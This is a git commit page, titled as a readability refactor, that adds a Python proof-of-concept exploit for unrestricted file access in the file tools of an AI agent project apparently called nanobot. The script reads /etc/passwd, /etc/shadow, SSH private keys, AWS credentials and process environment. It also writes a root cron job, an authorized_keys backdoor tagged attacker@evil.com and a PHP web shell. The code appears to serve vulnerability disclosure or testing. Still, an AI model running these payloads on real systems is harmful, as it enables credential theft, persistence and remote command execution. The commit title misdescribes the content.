Refactor code structure for improved readability and maintainability
This commit is contained in:
359
poc/exploits/path_traversal.py
Normal file
359
poc/exploits/path_traversal.py
Normal file
@@ -0,0 +1,359 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
POC: Path Traversal / Unrestricted File Access
|
||||
|
||||
This script demonstrates that the file system tools in nanobot allow
|
||||
unrestricted file access because `base_dir` is never passed to `_validate_path()`.
|
||||
|
||||
Affected code: nanobot/agent/tools/filesystem.py
|
||||
- _validate_path() supports base_dir restriction but it's never used
|
||||
- read_file, write_file, edit_file, list_dir all have unrestricted access
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import sys
|
||||
import os
|
||||
import tempfile
|
||||
|
||||
# Add parent directory to path for imports
|
||||
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
|
||||
|
||||
from nanobot.agent.tools.filesystem import (
|
||||
ReadFileTool,
|
||||
WriteFileTool,
|
||||
EditFileTool,
|
||||
ListDirTool
|
||||
)
|
||||
|
||||
|
||||
class PathTraversalPOC:
|
||||
"""Demonstrates path traversal vulnerabilities."""
|
||||
|
||||
def __init__(self):
|
||||
self.read_tool = ReadFileTool()
|
||||
self.write_tool = WriteFileTool()
|
||||
self.edit_tool = EditFileTool()
|
||||
self.list_tool = ListDirTool()
|
||||
self.results = []
|
||||
|
||||
async def test_read(self, name: str, path: str, expected_risk: str) -> dict:
|
||||
"""Test reading a file outside workspace."""
|
||||
result = {
|
||||
"name": name,
|
||||
"operation": "read",
|
||||
"path": path,
|
||||
"expected_risk": expected_risk,
|
||||
"success": False,
|
||||
"content_preview": None,
|
||||
"error": None
|
||||
}
|
||||
|
||||
try:
|
||||
content = await self.read_tool.execute(path=path)
|
||||
result["success"] = True
|
||||
result["content_preview"] = content[:300] if content else None
|
||||
except Exception as e:
|
||||
result["error"] = str(e)
|
||||
|
||||
self.results.append(result)
|
||||
return result
|
||||
|
||||
async def test_write(self, name: str, path: str, content: str, expected_risk: str) -> dict:
|
||||
"""Test writing a file outside workspace."""
|
||||
result = {
|
||||
"name": name,
|
||||
"operation": "write",
|
||||
"path": path,
|
||||
"expected_risk": expected_risk,
|
||||
"success": False,
|
||||
"error": None
|
||||
}
|
||||
|
||||
try:
|
||||
output = await self.write_tool.execute(path=path, content=content)
|
||||
result["success"] = "successfully" in output.lower() or "written" in output.lower() or "created" in output.lower()
|
||||
result["output"] = output
|
||||
except Exception as e:
|
||||
result["error"] = str(e)
|
||||
|
||||
self.results.append(result)
|
||||
return result
|
||||
|
||||
async def test_list(self, name: str, path: str, expected_risk: str) -> dict:
|
||||
"""Test listing a directory outside workspace."""
|
||||
result = {
|
||||
"name": name,
|
||||
"operation": "list",
|
||||
"path": path,
|
||||
"expected_risk": expected_risk,
|
||||
"success": False,
|
||||
"entries": None,
|
||||
"error": None
|
||||
}
|
||||
|
||||
try:
|
||||
output = await self.list_tool.execute(path=path)
|
||||
result["success"] = True
|
||||
result["entries"] = output[:500] if output else None
|
||||
except Exception as e:
|
||||
result["error"] = str(e)
|
||||
|
||||
self.results.append(result)
|
||||
return result
|
||||
|
||||
async def run_all_tests(self):
|
||||
"""Run all path traversal tests."""
|
||||
print("=" * 60)
|
||||
print("PATH TRAVERSAL / UNRESTRICTED FILE ACCESS POC")
|
||||
print("=" * 60)
|
||||
print()
|
||||
|
||||
# ==================== READ TESTS ====================
|
||||
print("--- READ OPERATIONS ---")
|
||||
print()
|
||||
|
||||
# Test 1: Read /etc/passwd
|
||||
print("[TEST 1] Read /etc/passwd")
|
||||
r = await self.test_read(
|
||||
"etc_passwd",
|
||||
"/etc/passwd",
|
||||
"System user enumeration"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 2: Read /etc/shadow (should fail due to permissions, not restrictions)
|
||||
print("[TEST 2] Read /etc/shadow (permission test)")
|
||||
r = await self.test_read(
|
||||
"etc_shadow",
|
||||
"/etc/shadow",
|
||||
"Password hash disclosure (if readable)"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 3: Read sensitive config
|
||||
print("[TEST 3] Read /sensitive/api_keys.txt")
|
||||
r = await self.test_read(
|
||||
"api_keys",
|
||||
"/sensitive/api_keys.txt",
|
||||
"API key disclosure"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 4: Read SSH keys
|
||||
print("[TEST 4] Read SSH Private Key")
|
||||
r = await self.test_read(
|
||||
"ssh_private_key",
|
||||
os.path.expanduser("~/.ssh/id_rsa"),
|
||||
"SSH private key disclosure"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 5: Read bash history
|
||||
print("[TEST 5] Read Bash History")
|
||||
r = await self.test_read(
|
||||
"bash_history",
|
||||
os.path.expanduser("~/.bash_history"),
|
||||
"Command history disclosure"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 6: Read environment file
|
||||
print("[TEST 6] Read /proc/self/environ")
|
||||
r = await self.test_read(
|
||||
"proc_environ",
|
||||
"/proc/self/environ",
|
||||
"Environment variable disclosure via procfs"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 7: Path traversal with ..
|
||||
print("[TEST 7] Path Traversal with ../")
|
||||
r = await self.test_read(
|
||||
"dot_dot_traversal",
|
||||
"/app/../etc/passwd",
|
||||
"Path traversal using ../"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 8: Read AWS credentials (if exists)
|
||||
print("[TEST 8] Read AWS Credentials")
|
||||
r = await self.test_read(
|
||||
"aws_credentials",
|
||||
os.path.expanduser("~/.aws/credentials"),
|
||||
"Cloud credential disclosure"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# ==================== WRITE TESTS ====================
|
||||
print("--- WRITE OPERATIONS ---")
|
||||
print()
|
||||
|
||||
# Test 9: Write to /tmp (should succeed)
|
||||
print("[TEST 9] Write to /tmp")
|
||||
r = await self.test_write(
|
||||
"tmp_write",
|
||||
"/tmp/poc_traversal_test.txt",
|
||||
"POC: This file was written via path traversal vulnerability\nTimestamp: " + str(asyncio.get_event_loop().time()),
|
||||
"Arbitrary file write to system directories"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 10: Write cron job (will fail due to permissions but shows intent)
|
||||
print("[TEST 10] Write to /etc/cron.d (permission test)")
|
||||
r = await self.test_write(
|
||||
"cron_write",
|
||||
"/etc/cron.d/poc_malicious",
|
||||
"* * * * * root /tmp/poc_payload.sh",
|
||||
"Cron job injection for persistence"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 11: Write SSH authorized_keys
|
||||
print("[TEST 11] Write SSH Authorized Keys")
|
||||
ssh_dir = os.path.expanduser("~/.ssh")
|
||||
r = await self.test_write(
|
||||
"ssh_authkeys",
|
||||
f"{ssh_dir}/authorized_keys_poc_test",
|
||||
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... attacker@evil.com",
|
||||
"SSH backdoor via authorized_keys"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 12: Write to web-accessible location
|
||||
print("[TEST 12] Write to /var/www (if exists)")
|
||||
r = await self.test_write(
|
||||
"www_write",
|
||||
"/var/www/html/poc_shell.php",
|
||||
"<?php system($_GET['cmd']); ?>",
|
||||
"Web shell deployment"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 13: Overwrite application files
|
||||
print("[TEST 13] Write to Application Directory")
|
||||
r = await self.test_write(
|
||||
"app_overwrite",
|
||||
"/app/poc/results/poc_app_write.txt",
|
||||
"POC: Application file overwrite successful",
|
||||
"Application code/config tampering"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# ==================== LIST TESTS ====================
|
||||
print("--- LIST OPERATIONS ---")
|
||||
print()
|
||||
|
||||
# Test 14: List root directory
|
||||
print("[TEST 14] List / (root)")
|
||||
r = await self.test_list(
|
||||
"list_root",
|
||||
"/",
|
||||
"File system enumeration"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 15: List /etc
|
||||
print("[TEST 15] List /etc")
|
||||
r = await self.test_list(
|
||||
"list_etc",
|
||||
"/etc",
|
||||
"Configuration enumeration"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 16: List home directory
|
||||
print("[TEST 16] List Home Directory")
|
||||
r = await self.test_list(
|
||||
"list_home",
|
||||
os.path.expanduser("~"),
|
||||
"User file enumeration"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
# Test 17: List /proc
|
||||
print("[TEST 17] List /proc")
|
||||
r = await self.test_list(
|
||||
"list_proc",
|
||||
"/proc",
|
||||
"Process enumeration via procfs"
|
||||
)
|
||||
self._print_result(r)
|
||||
|
||||
self._print_summary()
|
||||
return self.results
|
||||
|
||||
def _print_result(self, result: dict):
|
||||
"""Print a single test result."""
|
||||
if result["success"]:
|
||||
status = "⚠️ SUCCESS (VULNERABLE)"
|
||||
elif result.get("error") and "permission" in result["error"].lower():
|
||||
status = "🔒 PERMISSION DENIED (not a code issue)"
|
||||
elif result.get("error") and "not found" in result["error"].lower():
|
||||
status = "📁 FILE NOT FOUND"
|
||||
else:
|
||||
status = "❌ FAILED"
|
||||
|
||||
print(f" Status: {status}")
|
||||
print(f" Risk: {result['expected_risk']}")
|
||||
|
||||
if result.get("content_preview"):
|
||||
preview = result["content_preview"][:150].replace('\n', '\\n')
|
||||
print(f" Content: {preview}...")
|
||||
if result.get("entries"):
|
||||
print(f" Entries: {result['entries'][:150]}...")
|
||||
if result.get("output"):
|
||||
print(f" Output: {result['output'][:100]}")
|
||||
if result.get("error"):
|
||||
print(f" Error: {result['error'][:100]}")
|
||||
print()
|
||||
|
||||
def _print_summary(self):
|
||||
"""Print test summary."""
|
||||
print("=" * 60)
|
||||
print("SUMMARY")
|
||||
print("=" * 60)
|
||||
|
||||
read_success = sum(1 for r in self.results if r["operation"] == "read" and r["success"])
|
||||
write_success = sum(1 for r in self.results if r["operation"] == "write" and r["success"])
|
||||
list_success = sum(1 for r in self.results if r["operation"] == "list" and r["success"])
|
||||
|
||||
total_success = read_success + write_success + list_success
|
||||
|
||||
print(f"Read operations successful: {read_success}")
|
||||
print(f"Write operations successful: {write_success}")
|
||||
print(f"List operations successful: {list_success}")
|
||||
print(f"Total successful (vulnerable): {total_success}/{len(self.results)}")
|
||||
print()
|
||||
|
||||
if total_success > 0:
|
||||
print("⚠️ VULNERABILITY CONFIRMED: Unrestricted file system access")
|
||||
print()
|
||||
print("Successful operations:")
|
||||
for r in self.results:
|
||||
if r["success"]:
|
||||
print(f" - [{r['operation'].upper()}] {r['path']}")
|
||||
|
||||
return {
|
||||
"read_success": read_success,
|
||||
"write_success": write_success,
|
||||
"list_success": list_success,
|
||||
"total_success": total_success,
|
||||
"total_tests": len(self.results),
|
||||
"vulnerability_confirmed": total_success > 0
|
||||
}
|
||||
|
||||
|
||||
async def main():
|
||||
poc = PathTraversalPOC()
|
||||
results = await poc.run_all_tests()
|
||||
|
||||
# Write results to file
|
||||
import json
|
||||
results_path = "/results/path_traversal_results.json" if os.path.isdir("/results") else "path_traversal_results.json"
|
||||
with open(results_path, "w") as f:
|
||||
json.dump(results, f, indent=2, default=str)
|
||||
print(f"\nResults written to: {results_path}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
asyncio.run(main())
|
||||
Reference in New Issue
Block a user